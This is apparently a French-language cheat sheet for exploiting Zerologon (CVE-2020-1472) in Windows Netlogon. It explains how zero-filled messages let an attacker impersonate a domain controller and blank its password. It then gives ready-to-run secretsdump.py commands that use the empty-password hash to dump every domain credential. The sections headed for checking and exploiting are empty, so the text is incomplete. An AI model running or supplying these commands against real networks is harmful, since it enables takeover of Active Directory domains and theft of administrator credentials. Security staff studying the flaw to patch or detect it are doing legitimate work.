
[CVE-2020-1472] Appel de protocole distant Netlogon (MS-NRPC) Élévation de privilèges (Zerologon)
[CVE-2020-1472] Élévation de privilège via l'appel de protocole distant Netlogon (MS-NRPC) (Zerologon)
L'attaque décrite ici exploite des failles dans un protocole d'authentification cryptographique (utilisation non sécurisée d'AES-CFB8) qui prouve l'authenticité et l'identité d'un ordinateur joint au domaine auprès du contrôleur de domaine (DC). En raison d'une utilisation incorrecte d'un mode de fonctionnement AES, il est possible d'usurper l'identité de n'importe quel compte d'ordinateur (y compris celui du DC lui-même) et de définir un mot de passe vide (simplement en envoyant un certain nombre de messages Netlogon dont divers champs sont remplis de zéros) pour ce compte dans le domaine. Cela peut ensuite être utilisé pour obtenir les identifiants d'administrateur du domaine, puis restaurer le mot de passe d'origine du DC.
Pour vérifier CVE-2020-1472
Pour exploiter CVE-2020-1472
Ensuite, exécutez l'une des commandes suivantes
Exemple format 1 : python secretsdump.py domain/example-dc$@fqdn-of-dc
./secretsdump.py zerologon.local/DC01\[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 -just-dc
Exemple format 2 : python secretsdump.py domain/example-dc$@ip-of-dc
./secretsdump.py zerologon.local/DC01\[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 -just-dc

Le billet de blog original est disponible ici
Le dépôt original contenant le script de test Python est disponible ici
Le dépôt original contenant le script d'exploitation Python est disponible ici